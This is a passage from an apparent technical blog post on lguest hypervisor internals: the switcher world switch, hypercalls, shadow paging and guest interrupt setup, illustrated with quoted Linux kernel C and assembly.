lg.ko contains the core hypervisor code. It exposes an interface (/dev/lguest) to userspace, prepares the guest environment, launches the guest, and processes guest exit events.</p>
<h2> Switcher </h2>
<p>The switcher performs the world switch. It must be located at an identical virtual address in the guest kernel and the host. The guest user and kernel share the same page table, just like in traditional Linux.
When lg.ko is loaded, it calls 'map_switcher' to map the switcher code into the host. The allocation contains TOTAL_SWITCHER_PAGES pages.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define TOTAL_SWITCHER_PAGES (1 + 2 * nr_cpu_ids)
static __init int map_switcher(void)
{
...
lg_switcher_pages = kmalloc(sizeof(lg_switcher_pages[0])
* TOTAL_SWITCHER_PAGES,
GFP_KERNEL);
...
}
</code></pre></div></div>
<p>Every physical CPU has two pages, which are used to load and store vCPU state.
The following shows the lg_switcher_pages layout.</p>
<p><img src="/assets/img/lguestinternals/2.png" alt="" /></p>
<p>The switcher code itself occupies just one page; following it are the two per-CPU pages.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* We have two pages shared with guests, per cpu. */
struct lguest_pages {
/* This is the stack page mapped rw in guest */
char spare[PAGE_SIZE - sizeof(struct lguest_regs)];
struct lguest_regs regs;
/* This is the host state & guest descriptor page, ro in guest */
struct lguest_ro_state state;
} __attribute__((aligned(PAGE_SIZE)));
/* This is a guest-specific page (mapped ro) into the guest. */
struct lguest_ro_state {
/* Host information we need to restore when we switch back. */
u32 host_cr3;
struct desc_ptr host_idt_desc;
struct desc_ptr host_gdt_desc;
u32 host_sp;
/* Fields which are used when guest is running. */
struct desc_ptr guest_idt_desc;
struct desc_ptr guest_gdt_desc;
struct x86_hw_tss guest_tss;
struct desc_struct guest_idt[IDT_ENTRIES];
struct desc_struct guest_gdt[GDT_ENTRIES];
};
</code></pre></div></div>
<p>The ‘spare’ and ‘regs’ fields together form the stack for the switcher. ‘regs’ holds the guest register values.
The ‘state’ field stores host and guest state information.</p>
<h2> CPU virtualization </h2>
<p>Without hardware support, the guest traps to the host in two ways: hypercalls and interrupts/exceptions. A hypercall is itself implemented via an interrupt.</p>
<p>The following picture shows the process of VM exit and VM entry. When the guest executes an interrupt, such as an interrupt-based syscall, or hits an exception, the CPU transitions to the switcher code (in host ring 0) through the pre-defined handler in the IDT. The switcher first stores the guest state, then restores the host state and switches to the host via switch_to_host. After handling the exit event, the host calls the switcher function switch_to_guest to re-enter the guest, which stores the host state and loads the guest state.</p>
<p><img src="/assets/img/lguestinternals/3.png" alt="" /></p>
<h3> VM entry </h3>
<p>In ‘lguest_arch_host_init’ the ‘lguest_entry’ struct is initialized as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> lguest_entry.offset = (long)switch_to_guest + switcher_offset();
lguest_entry.segment = LGUEST_CS;
</code></pre></div></div>
<p>The ‘offset’ is set to the ‘switch_to_guest’ address.
Then in ‘run_guest_once’ it is used as the operand of an lcall instruction.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> asm volatile("pushf; lcall *%4"
/*
* This is how we tell GCC that %eax ("a") and %ebx ("b")
* are changed by this routine. The "=" means output.
*/
: "=a"(clobber), "=b"(clobber)
/*
* %eax contains the pages pointer. ("0" refers to the
* 0-th argument above, ie "a"). %ebx contains the
* physical address of the Guest's top-level page
* directory.
*/
: "0"(pages),
"1"(__pa(cpu->lg->pgdirs[cpu->cpu_pgd].pgdir)),
"m"(lguest_entry)
/*
* We tell gcc that all these registers could change,
* which means we don't have to save and restore them in
* the Switcher.
*/
: "memory", "%edx", "%ecx", "%edi", "%esi");
</code></pre></div></div>
<p>This lcall jumps to ‘switch_to_guest’, which is assembly code that performs the host-to-guest switch.
Before lcall executes, ‘pushf’ pushes the eflags onto the host stack. The ‘lcall’ instruction then pushes ‘cs’ and ‘eip’ onto the host stack. At the start of ‘switch_to_guest’, ‘es/ds/gs/fs/ebp’ are pushed onto the host stack and ‘esp’ is stored in the ‘lguest_pages’ state-&gt;host_sp. At this point the host state has been saved, and we can load the guest state.</p>
<p><img src="/assets/img/lguestinternals/4.png" alt="" /></p>
<p>First we switch to the switcher’s stack.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> movl %eax, %edx
addl $LGUEST_PAGES_regs, %edx
movl %edx, %esp
</code></pre></div></div>
<p>Here ‘eax’ points to the beginning of ‘lguest_pages’. After these instructions, ‘esp’ points to the beginning of ‘lguest_regs’.
Then the switcher loads the guest IDT/GDT/TSS; the main use of the TSS is to specify the ss/esp used when the guest exits to the host.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> // The Guest's GDT we so carefully
// Placed in the "struct lguest_pages" before
lgdt LGUEST_PAGES_guest_gdt_desc(%eax)
// The Guest's IDT we did partially
// Copy to "struct lguest_pages" as well.
lidt LGUEST_PAGES_guest_idt_desc(%eax)
// The TSS entry which controls traps
// Must be loaded up with "ltr" now:
// The GDT entry that TSS uses
// Changes type when we load it: damn Intel!
// For after we switch over our page tables
// That entry will be read-only: we'd crash.
movl $(GDT_ENTRY_TSS*8), %edx
ltr %dx
// Look back now, before we take this last step!
// The Host's TSS entry was also marked used;
// Let's clear it again for our return.
// The GDT descriptor of the Host
// Points to the table after two "size" bytes
movl (LGUEST_PAGES_host_gdt_desc+2)(%eax), %edx
// Clear "used" from type field (byte 5, bit 2)
andb $0xFD, (GDT_ENTRY_TSS*8 + 5)(%edx)
</code></pre></div></div>
<p>Before switching to the guest, we need to load the guest’s cr3.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> // Once our page table's switched, the Guest is live!
// The Host fades as we run this final step.
// Our "struct lguest_pages" is now read-only.
movl %ebx, %cr3
</code></pre></div></div>
<p>Then we restore the guest state. Notice we have changed cr3, so the following code actually executes in the guest address space. This is why we need to map the switcher to the same address in both the host and the guest kernel.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> // The page table change did one tricky thing:
// The Guest's register page has been mapped
// Writable under our %esp (stack) --
// We can simply pop off all Guest regs.
popl %eax
popl %ebx
popl %ecx
popl %edx
popl %esi
popl %edi
popl %ebp
popl %gs
popl %fs
popl %ds
popl %es
// Near the base of the stack lurk two strange fields
// Which we fill as we exit the Guest
// These are the trap number and its error
// We can simply step past them on our way.
addl $8, %esp
// The last five stack slots hold return address
// And everything needed to switch privilege
// From Switcher's level 0 to Guest's 1,
// And the stack where the Guest had last left it.
// Interrupts are turned back on: we are Guest.
iret
</code></pre></div></div>
<p>After the ‘addl’ instruction, ‘esp’ points past the ‘trapnum’ and ‘errcode’ fields, and the last five stack slots fake an iret frame. The first time the guest runs, the registers are initialized to the following values.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void lguest_arch_setup_regs(struct lg_cpu *cpu, unsigned long start)
{
...
regs->ds = regs->es = regs->ss = __KERNEL_DS|GUEST_PL;
regs->cs = __KERNEL_CS|GUEST_PL;
...
regs->eflags = X86_EFLAGS_IF | X86_EFLAGS_FIXED;
...
regs->eip = start;
...
}
</code></pre></div></div>
<p>The ‘eip’ is set from userspace; it is the vmlinux ELF ‘e_entry’, which is ‘startup_32’ in ‘arch/x86/kernel/head_32.S’. The ‘esp’ is not set, as the stack is set up by the guest OS itself.</p>
<h3> VM exit </h3>
<p>Now the guest is running in ring 1. When the guest needs to trap to the host, it triggers an interrupt by executing an ‘int’ instruction. The guest idt stubs are defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> .text
// The first two traps go straight back to the Host
IRQ_STUBS 0 1 return_to_host
// We'll say nothing, yet, about NMI
IRQ_STUB 2 handle_nmi
// Other traps also return to the Host
IRQ_STUBS 3 31 return_to_host
// All interrupts go via their handlers
IRQ_STUBS 32 127 deliver_to_host
// 'Cept system calls coming from userspace
// Are to go to the Guest, never the Host.
IRQ_STUB 128 return_to_host
IRQ_STUBS 129 255 deliver_to_host
.macro IRQ_STUB N TARGET
.data; .long 1f; .text; 1:
// Trap eight, ten through fourteen and seventeen
// Supply an error number. Else zero.
.if (\N <> 8) && (\N < 10 || \N > 14) && (\N <> 17)
pushl $0
.endif
pushl $\N
jmp \TARGET
ALIGN
.endm
// This macro creates numerous entries
// Using GAS macros which out-power C's.
.macro IRQ_STUBS FIRST LAST TARGET
irq=\FIRST
.rept \LAST-\FIRST+1
IRQ_STUB irq \TARGET
irq=irq+1
.endr
.endm
</code></pre></div></div>
<p>Some interrupts/exceptions (8, 10-14, 17) have an error code, which is pushed onto the stack by the hardware. In the other cases, the stub pushes 0 onto the stack instead.</p>
<p><img src="/assets/img/lguestinternals/5.png" alt="" /></p>
<p>In order to know which interrupt fired, we also push the trap number onto the stack.</p>
<p>Let’s take 0x80 (128) as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> return_to_host:
SWITCH_TO_HOST
iret
</code></pre></div></div>
<p>The core is ‘SWITCH_TO_HOST’. First we push the guest general registers onto the stack. Notice the stack now points into ‘lguest_pages’ and ‘esp’ points to ‘trapnum’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define SWITCH_TO_HOST \
/* We save the Guest state: all registers first \
* Laid out just as "struct lguest_regs" defines */ \
pushl %es; \
pushl %ds; \
pushl %fs; \
pushl %gs; \
pushl %ebp; \
pushl %edi; \
pushl %esi; \
pushl %edx; \
pushl %ecx; \
pushl %ebx; \
pushl %eax; \
</code></pre></div></div>
<p>Load the switcher’s data segment (LGUEST_DS) into ds:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> movl $(LGUEST_DS), %eax; \
movl %eax, %ds; \
</code></pre></div></div>
<p>Get the lguest_pages start address, then load the host cr3, the host gdt and idt, change esp to the host esp, and load the tss.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> movl %esp, %eax; \
andl $(~(1 << PAGE_SHIFT - 1)), %eax; \
/* Save our trap number: the switch will obscure it \
* (In the Host the Guest regs are not mapped here) \
* %ebx holds it safe for deliver_to_host */ \
movl LGUEST_PAGES_regs_trapnum(%eax), %ebx; \
/* The Host GDT, IDT and stack! \
* All these lie safely hidden from the Guest: \
* We must return to the Host page tables \
* (Hence that was saved in struct lguest_pages) */ \
movl LGUEST_PAGES_host_cr3(%eax), %edx; \
movl %edx, %cr3; \
/* As before, when we looked back at the Host \
* As we left and marked TSS unused \
* So must we now for the Guest left behind. */ \
andb $0xFD, (LGUEST_PAGES_guest_gdt+GDT_ENTRY_TSS*8+5)(%eax); \
/* Switch to Host's GDT, IDT. */ \
lgdt LGUEST_PAGES_host_gdt_desc(%eax); \
lidt LGUEST_PAGES_host_idt_desc(%eax); \
/* Restore the Host's stack where its saved regs lie */ \
movl LGUEST_PAGES_host_sp(%eax), %esp; \
/* Last the TSS: our Host is returned */ \
movl $(GDT_ENTRY_TSS*8), %edx; \
ltr %dx; \
</code></pre></div></div>
<p>Finally pop the registers that ‘switch_to_guest’ pushed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* Restore now the regs saved right at the first. */ \
popl %ebp; \
popl %fs; \
popl %gs; \
popl %ds; \
popl %es
</code></pre></div></div>
<p>After ‘SWITCH_TO_HOST’, ‘return_to_host’ executes an iret instruction. The switcher then returns to the instruction after ‘lcall’ in the ‘run_guest_once’ function. Thus we have completed the VM entry and VM exit world switches.</p>
<h2> Hypercall </h2>
<p>Before we continue, let’s see how the guest communicates with the host using hypercalls.
Paravirtualization relies on hypercalls to perform sensitive operations. lguest defines the following hypercalls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define LHCALL_FLUSH_ASYNC 0
#define LHCALL_LGUEST_INIT 1
#define LHCALL_SHUTDOWN 2
#define LHCALL_NEW_PGTABLE 4
#define LHCALL_FLUSH_TLB 5
#define LHCALL_LOAD_IDT_ENTRY 6
#define LHCALL_SET_STACK 7
#define LHCALL_TS 8
#define LHCALL_SET_CLOCKEVENT 9
#define LHCALL_HALT 10
#define LHCALL_SET_PMD 13
#define LHCALL_SET_PTE 14
#define LHCALL_SET_PGD 15
#define LHCALL_LOAD_TLS 16
#define LHCALL_LOAD_GDT_ENTRY 18
#define LHCALL_SEND_INTERRUPTS 19
</code></pre></div></div>
<p>The guest makes a hypercall by calling ‘hcall’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline unsigned long
hcall(unsigned long call,
unsigned long arg1, unsigned long arg2, unsigned long arg3,
unsigned long arg4)
{
/* "int" is the Intel instruction to trigger a trap. */
asm volatile("int $" __stringify(LGUEST_TRAP_ENTRY)
/* The call in %eax (aka "a") might be overwritten */
: "=a"(call)
/* The arguments are in %eax, %ebx, %ecx, %edx & %esi */
: "a"(call), "b"(arg1), "c"(arg2), "d"(arg3), "S"(arg4)
/* "memory" means this might write somewhere in memory.
* This isn't true for all calls, but it's safe to tell
* gcc that it might happen so it doesn't get clever. */
: "memory");
return call;
}
</code></pre></div></div>
<p>%eax holds the hypercall number; %ebx, %ecx, %edx and %esi hold the arguments. The ‘int’ instruction traps to the host. After this interrupt, control returns to the host. Later, in ‘lguest_arch_handle_trap’, we pick up the arguments:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case LGUEST_TRAP_ENTRY:
/*
* Our 'struct hcall_args' maps directly over our regs: we set
* up the pointer now to indicate a hypercall is pending.
*/
cpu->hcall = (struct hcall_args *)cpu->regs;
</code></pre></div></div>
<p>hcall_args is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct hcall_args {
/* These map directly onto eax/ebx/ecx/edx/esi in struct lguest_regs */
unsigned long arg0, arg1, arg2, arg3, arg4;
};
</code></pre></div></div>
<p>In the next round of ‘run_guest’, ‘do_hypercalls’ is called, which in turn calls ‘do_hcall’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int run_guest(struct lg_cpu *cpu, unsigned long __user *user)
{
...
/* We stop running once the Guest is dead. */
while (!cpu->lg->dead) {
unsigned int irq;
bool more;
/* First we run any hypercalls the Guest wants done. */
if (cpu->hcall)
do_hypercalls(cpu);
...
}
...
}
</code></pre></div></div>
<p>‘do_hcall’ is a big switch-case handling the LHCALL_XXX hypercalls.</p>
<h2> Memory virtualization </h2>
<p>lguest uses shadow page tables for memory virtualization.
Shadow paging is the classic approach to MMU virtualization; the following shows the idea.</p>
<p><img src="/assets/img/lguestinternals/6.png" alt="" /></p>
<p>The key point is that the value loaded into the CPU CR3 register is the host physical address (HPA) of the shadow page table. When the guest updates its page table, it traps to lguest, which updates the shadow page table.</p>
<h3> Initialization </h3>
<p>The initial shadow page table is initialized in ‘init_guest_pagetable’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int init_guest_pagetable(struct lguest *lg)
{
struct lg_cpu *cpu = &lg->cpus[0];
int allocated = 0;
/* lg (and lg->cpus[]) starts zeroed: this allocates a new pgdir */
cpu->cpu_pgd = new_pgdir(cpu, 0, &allocated);
if (!allocated)
return -ENOMEM;
/* We start with a linear mapping until the initialize. */
cpu->linear_pages = true;
/* Allocate the page tables for the Switcher. */
if (!allocate_switcher_mapping(cpu)) {
release_all_pagetables(lg);
return -ENOMEM;
}
return 0;
}
</code></pre></div></div>
<p>‘new_pgdir’ creates a new page directory, i.e. a new shadow page table.
‘cpu-&gt;linear_pages’ is set to true here: this is the freshly-created guest case. Unlike a physical machine, which starts in real mode where memory accesses are untranslated, here the CPU is in protected mode and memory accesses are translated. So we need to create a shadow page table even though the guest has no page table of its own yet.</p>
<p>Let’s dive into some details. When the guest starts to execute the guest kernel code, it starts at 0x1000000 (the guest kernel start address from the build). As CR3 was set to the new page directory in ‘init_guest_pagetable’, the first instruction will cause a page fault.</p>
<p><img src="/assets/img/lguestinternals/7.png" alt="" /></p>
<p>‘demand_page’ handles this page fault. The initial case (where the guest hasn’t created page tables yet) is quite easy: ‘demand_page’ just needs to set up the shadow page table.</p>
<p>First find the PTE table and the PTE entry in the shadow page table, then set the page in the PTE entry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gpte = __pte((vaddr & PAGE_MASK) | _PAGE_RW | _PAGE_PRESENT);
...
spte = find_spte(cpu, vaddr, true, pgd_flags(gpgd), pmd_flags(gpmd));
...
set_pte(spte, gpte_to_spte(cpu, pte_wrprotect(gpte), 0));
</code></pre></div></div>
<p>The core function is ‘gpte_to_spte’, which translates a gpte into an spte. Here the ‘gpte’ is constructed directly from ‘vaddr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static pte_t gpte_to_spte(struct lg_cpu *cpu, pte_t gpte, int write)
{
unsigned long pfn, base, flags;
...
base = (unsigned long)cpu->lg->mem_base / PAGE_SIZE;
...
pfn = get_pfn(base + pte_pfn(gpte), write);
...
return pfn_pte(pfn, __pgprot(flags));
}
</code></pre></div></div>
<p>The guest’s physical address space is a virtual address range of the lguest launcher process, so ‘base + pte_pfn(gpte)’ is the frame number of that virtual address. ‘get_pfn’ first gets the page backing this virtpfn and then returns the host physical frame number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static unsigned long get_pfn(unsigned long virtpfn, int write)
{
struct page *page;
/* gup me one page at this address please! */
if (get_user_pages_fast(virtpfn << PAGE_SHIFT, 1, write, &page) == 1)
return page_to_pfn(page);
/* This value indicates failure. */
return -1UL;
}
</code></pre></div></div>
<p>Finally ‘set_pte’ sets the physical address in the shadow PTE entry.</p>
<p>Let’s add a ‘printk’ in ‘demand_page’.</p>
<p><img src="/assets/img/lguestinternals/8.png" alt="" /></p>
<p>We can see that when the guest begins to execute the startup_32 code, it first hits a page fault, as the shadow page table is not yet set up.</p>
<p><img src="/assets/img/lguestinternals/9.png" alt="" /></p>
<p>The dmesg output stops once the guest creates its own page table. Then ‘cpu-&gt;linear_pages’ is set to false, and the shadow page table really shadows the guest page table.</p>
<p><img src="/assets/img/lguestinternals/10.png" alt="" /></p>
<h3> Guest create pagetables </h3>
<p>The guest starts at ‘startup_32’. Before jumping to lguest_entry, it creates an ‘initial_page_table’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> page_pde_offset = (__PAGE_OFFSET >> 20);
movl $pa(__brk_base), %edi
movl $pa(initial_page_table), %edx
movl $PTE_IDENT_ATTR, %eax
10:
leal PDE_IDENT_ATTR(%edi),%ecx /* Create PDE entry */
movl %ecx,(%edx) /* Store identity PDE entry */
movl %ecx,page_pde_offset(%edx) /* Store kernel PDE entry */
addl $4,%edx
movl $1024, %ecx
11:
stosl
addl $0x1000,%eax
loop 11b
/*
* End condition: we must map up to the end + MAPPING_BEYOND_END.
*/
movl $pa(_end) + MAPPING_BEYOND_END + PTE_IDENT_ATTR, %ebp
cmpl %ebp,%eax
jb 10b
addl $__PAGE_OFFSET, %edi
movl %edi, pa(_brk_end)
shrl $12, %eax
movl %eax, pa(max_pfn_mapped)
/* Do early initialization of the fixmap area */
movl $pa(initial_pg_fixmap)+PDE_IDENT_ATTR,%eax
movl %eax,pa(initial_page_table+0xffc)
</code></pre></div></div>
<p>The following shows the initial_page_table. The kernel code is mapped at low addresses where the pa is identical to the va (identity mapping), and also at the high kernel address (above 0xc0000000).</p>
<p><img src="/assets/img/lguestinternals/11.png" alt="" /></p>
<p>Then the following code jumps to lguest_entry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #ifdef CONFIG_PARAVIRT
/* This is can only trip for a broken bootloader... */
cmpw $0x207, pa(boot_params + BP_version)
jb default_entry
/* Paravirt-compatible boot parameters. Look to see what architecture
we're booting under. */
movl pa(boot_params + BP_hardware_subarch), %eax
cmpl $num_subarch_entries, %eax
jae bad_subarch
movl pa(subarch_entries)(,%eax,4), %eax
subl $__PAGE_OFFSET, %eax
jmp *%eax
</code></pre></div></div>
<p>In lguest_entry, the guest first makes an LHCALL_LGUEST_INIT hypercall, which does some initialization work; in it the initial shadow page table is cleared. This is why, on return to the following code, another page fault is triggered.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ENTRY(lguest_entry)
/*
* We make the "initialization" hypercall now to tell the Host where
* our lguest_data struct is.
*/
movl $LHCALL_LGUEST_INIT, %eax
movl $lguest_data - __PAGE_OFFSET, %ebx
int $LGUEST_TRAP_ENTRY
/* Now turn our pagetables on; setup by arch/x86/kernel/head_32.S. */
movl $LHCALL_NEW_PGTABLE, %eax
movl $(initial_page_table - __PAGE_OFFSET), %ebx
int $LGUEST_TRAP_ENTRY
/* Set up the initial stack so we can run C code. */
movl $(init_thread_union+THREAD_SIZE),%esp
/* Jumps are relative: we're running __PAGE_OFFSET too low. */
jmp lguest_init+__PAGE_OFFSET
</code></pre></div></div>
<p>This hypercall instructs the host to build a shadow page table which shadows the ‘initial_page_table’ created by the guest. The guest’s page table is also switched to this new one.
The final jmp goes to lguest_init, which is at a high virtual address (above 0xc0000000).</p>
<p>Later, when the guest creates a new page table and loads it into cr3 (load_cr3), it traps to the host, which creates a new shadow page table. When the guest updates its page table, it invokes the pv_mmu_ops hooks, mostly implemented by lguest. These hooks make hypercalls to update the corresponding shadow page table.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* Pagetable management */
pv_mmu_ops.write_cr3 = lguest_write_cr3;
pv_mmu_ops.flush_tlb_user = lguest_flush_tlb_user;
pv_mmu_ops.flush_tlb_single = lguest_flush_tlb_single;
pv_mmu_ops.flush_tlb_kernel = lguest_flush_tlb_kernel;
pv_mmu_ops.set_pte = lguest_set_pte;
pv_mmu_ops.set_pte_at = lguest_set_pte_at;
pv_mmu_ops.set_pmd = lguest_set_pmd;
#ifdef CONFIG_X86_PAE
pv_mmu_ops.set_pte_atomic = lguest_set_pte_atomic;
pv_mmu_ops.pte_clear = lguest_pte_clear;
pv_mmu_ops.pmd_clear = lguest_pmd_clear;
pv_mmu_ops.set_pud = lguest_set_pud;
#endif
pv_mmu_ops.read_cr2 = lguest_read_cr2;
pv_mmu_ops.read_cr3 = lguest_read_cr3;
pv_mmu_ops.lazy_mode.enter = paravirt_enter_lazy_mmu;
pv_mmu_ops.lazy_mode.leave = lguest_leave_lazy_mmu_mode;
pv_mmu_ops.lazy_mode.flush = paravirt_flush_lazy_mmu;
pv_mmu_ops.pte_update = lguest_pte_update;
pv_mmu_ops.pte_update_defer = lguest_pte_update;
</code></pre></div></div>
<p>When the guest triggers a shadow page fault, ‘demand_page’ is called to handle it; the following shows the process. We read the guest ‘gpgd’ and ‘gpte’; if either doesn’t exist, the guest hasn’t set up its own page table, so demand_page returns false and lguest injects a page-fault interrupt into the guest, letting the guest handle the fault first. If both the guest ‘gpgd’ and ‘gpte’ exist, the fault was caused by the shadow page table; ‘demand_page’ finds the ‘spte’ and sets it according to the ‘gpte’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool demand_page(struct lg_cpu *cpu, unsigned long vaddr, int errcode,
unsigned long *iomem)
{
unsigned long gpte_ptr;
pte_t gpte;
pte_t *spte;
pmd_t gpmd;
pgd_t gpgd;
*iomem = 0;
/* First step: get the top-level Guest page table entry. */
if (unlikely(cpu->linear_pages)) {
...
} else {
gpgd = lgread(cpu, gpgd_addr(cpu, vaddr), pgd_t);
/* Toplevel not present? We can't map it in. */
if (!(pgd_flags(gpgd) & _PAGE_PRESENT))
return false;
/*
* This kills the Guest if it has weird flags or tries to
* refer to a "physical" address outside the bounds.
*/
if (!check_gpgd(cpu, gpgd))
return false;
}
...
gpte_ptr = gpte_addr(cpu, gpgd, vaddr);
if (unlikely(cpu->linear_pages)) {
...
} else {
/* Read the actual PTE value. */
gpte = lgread(cpu, gpte_ptr, pte_t);
}
/* If this page isn't in the Guest page tables, we can't page it in. */
if (!(pte_flags(gpte) & _PAGE_PRESENT))
return false;
...
/* Add the _PAGE_ACCESSED and (for a write) _PAGE_DIRTY flag */
gpte = pte_mkyoung(gpte);
if (errcode & 2)
gpte = pte_mkdirty(gpte);
/* Get the pointer to the shadow PTE entry we're going to set. */
spte = find_spte(cpu, vaddr, true, pgd_flags(gpgd), pmd_flags(gpmd));
if (!spte)
return false;
...
if (pte_dirty(gpte))
*spte = gpte_to_spte(cpu, gpte, 1);
else
/*
* If this is a read, don't set the "writable" bit in the page
* table entry, even if the Guest says it's writable. That way
* we will come back here when a write does actually occur, so
* we can update the Guest's _PAGE_DIRTY flag.
*/
set_pte(spte, gpte_to_spte(cpu, pte_wrprotect(gpte), 0));
/*
* Finally, we write the Guest PTE entry back: we've set the
* _PAGE_ACCESSED and maybe the _PAGE_DIRTY flags.
*/
if (likely(!cpu->linear_pages))
lgwrite(cpu, gpte_ptr, pte_t, gpte);
/*
* The fault is fixed, the page table is populated, the mapping
* manipulated, the result returned and the code complete. A small
* delay and a trace of alliteration are the only indications the Guest
* has that a page fault occurred at all.
*/
return true;
}
</code></pre></div></div>
<p>If ‘demand_page’ handles the page fault, it returns true. If not, ‘lguest_arch_handle_trap’ sets ‘lg-&gt;lguest_data-&gt;cr2’ to the fault address and calls ‘deliver_trap’, which pushes an interrupt frame onto the guest stack so that when the guest runs in the next round, it first handles this page fault.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void lguest_arch_handle_trap(struct lg_cpu *cpu)
{
unsigned long iomem_addr;
switch (cpu->regs->trapnum) {
case 13: /* We've intercepted a General Protection Fault. */
...
break;
case 14: /* We've intercepted a Page Fault. */
...
if (demand_page(cpu, cpu->arch.last_pagefault,
cpu->regs->errcode, &iomem_addr))
return;
...
if (cpu->lg->lguest_data &&
put_user(cpu->arch.last_pagefault,
&cpu->lg->lguest_data->cr2))
kill_guest(cpu, "Writing cr2");
break;
case 7: /* We've intercepted a Device Not Available fault. */
...
}
/* We didn't handle the trap, so it needs to go to the Guest. */
if (!deliver_trap(cpu, cpu->regs->trapnum))
/*
* If the Guest doesn't have a handler (either it hasn't
* registered any yet, or it's one of the faults we don't let
* it handle), it dies with this cryptic error message.
*/
kill_guest(cpu, "unhandled trap %li at %#lx (%#lx)",
cpu->regs->trapnum, cpu->regs->eip,
cpu->regs->trapnum == 14 ? cpu->arch.last_pagefault
: cpu->regs->errcode);
}
</code></pre></div></div>
<p>Interrupt handling is explored in the next section.</p>
<h2> Interrupt virtualization </h2>
<h3> Overview </h3>
<p>There are three kinds of interrupts related to the guest: real hardware interrupts which occur while the guest is running, interrupts generated by the guest’s virtual devices, and traps and faults raised by the guest itself.</p>
<p>When the lguest module is installed, the ‘init’ function calls ‘lguest_arch_host_init’, which initializes the ‘guest_idt_desc’ in ‘lguest_pages’.
‘default_idt_entries’ is defined at the end of the switcher page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> .data
.global default_idt_entries
default_idt_entries:
.text
// The first two traps go straight back to the Host
IRQ_STUBS 0 1 return_to_host
// We'll say nothing, yet, about NMI
IRQ_STUB 2 handle_nmi
// Other traps also return to the Host
IRQ_STUBS 3 31 return_to_host
// All interrupts go via their handlers
IRQ_STUBS 32 127 deliver_to_host
// 'Cept system calls coming from userspace
// Are to go to the Guest, never the Host.
IRQ_STUB 128 return_to_host
IRQ_STUBS 129 255 deliver_to_host
// The NMI, what a fabulous beast
// Which swoops in and stops us no matter that
// We're suspended between heaven and hell,
// (Or more likely between the Host and Guest)
// When in it comes! We are dazed and confused
// So we do the simplest thing which one can.
// Though we've pushed the trap number and zero
// We discard them, return, and hope we live.
handle_nmi:
addl $8, %esp
iret
// We are done; all that's left is Mastery
// And "make Mastery" is a journey long
// Designed to make your fingers itch to code.
// Here ends the text, the file and poem.
ENTRY(end_switcher_text)
</code></pre></div></div>
<p>First we add the switcher_offset to every entry in ‘default_idt_entries’; this gives the loaded address of the idt entries. Then ‘setup_default_idt_entries’ sets the guest’s default idt entries.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init lguest_arch_host_init(void)
{
int i;
...
for (i = 0; i < IDT_ENTRIES; i++)
default_idt_entries[i] += switcher_offset();
/*
* Set up the Switcher's per-cpu areas.
*
* Each CPU gets two pages of its own within the high-mapped region
* (aka. "struct lguest_pages"). Much of this can be initialized now,
* but some depends on what Guest we are running (which is set up in
* copy_in_guest_info()).
*/
for_each_possible_cpu(i) {
/* lguest_pages() returns this CPU's two pages. */
struct lguest_pages *pages = lguest_pages(i);
/* This is a convenience pointer to make the code neater. */
struct lguest_ro_state *state = &pages->state;
...
store_idt(&state->host_idt_desc);
/*
* The descriptors for the Guest's GDT and IDT can be filled
* out now, too. We copy the GDT & IDT into ->guest_gdt and
* ->guest_idt before actually running the Guest.
*/
state->guest_idt_desc.size = sizeof(state->guest_idt)-1;
state->guest_idt_desc.address = (long)&state->guest_idt;
state->guest_gdt_desc.size = sizeof(state->guest_gdt)-1;
state->guest_gdt_desc.address = (long)&state->guest_gdt;
...
setup_default_gdt_entries(state);
/* Most IDT entries are the same for all Guests, too.*/
setup_default_idt_entries(state, default_idt_entries);
/*
* The Host needs to be able to use the LGUEST segments on this
* CPU, too, so put them in the Host GDT.
*/
get_cpu_gdt_table(i)[GDT_ENTRY_LGUEST_CS] = FULL_EXEC_SEGMENT;
get_cpu_gdt_table(i)[GDT_ENTRY_LGUEST_DS] = FULL_SEGMENT;
}
...
}
</code></pre></div></div>
<p>The default idt entries are generated by the ‘IRQ_STUBS’ and ‘IRQ_STUB’ macros.
